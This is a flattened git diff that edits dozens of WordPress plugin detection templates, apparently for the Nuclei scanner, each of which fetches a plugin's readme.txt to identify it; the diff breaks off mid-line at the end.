+13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..6dcfa9c94a 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..0864c3bdda 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/fast-indexing-api/readme.txt" diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..3f350899b7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 4ba4fbeff4..ce224d3b85 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..a40b5e99f0 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/gdpr-cookie-compliance/readme.txt" diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..34113b27b5 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-and-footer-scripts/readme.txt" diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/host-webfonts-local/readme.txt" diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..92490dc818 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 1778552d75..668ce839f8 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..c1a44066bb 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/jetpack-boost/readme.txt" diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..7f07f79c0b 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..303e1c629b 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/loginpress/readme.txt" diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-wp/readme.txt" diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 67f5eeae02..70073e1ac1 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/members/readme.txt" diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..540d535ecc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..a0ec16b285 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..fed1bd27a6 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..8b4b78a517 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/otter-blocks/readme.txt" diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..ef3a03e9f4 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..f8301a9fd3 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt" diff --git a/http/technologies/wordpress/plugins/php-compatibility-checker.yaml b/http/technologies/wordpress/plugins/php-compatibility-checker.yaml index b2b2dc4c95..54e430c7f8 100644 --- a/http/technologies/wordpress/plugins/php-compatibility-checker.yaml +++ b/http/technologies/wordpress/plugins/php-compatibility-checker.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/php-compatibility-checker/readme.txt" diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/pinterest-for-woocommerce/readme.txt" diff --git 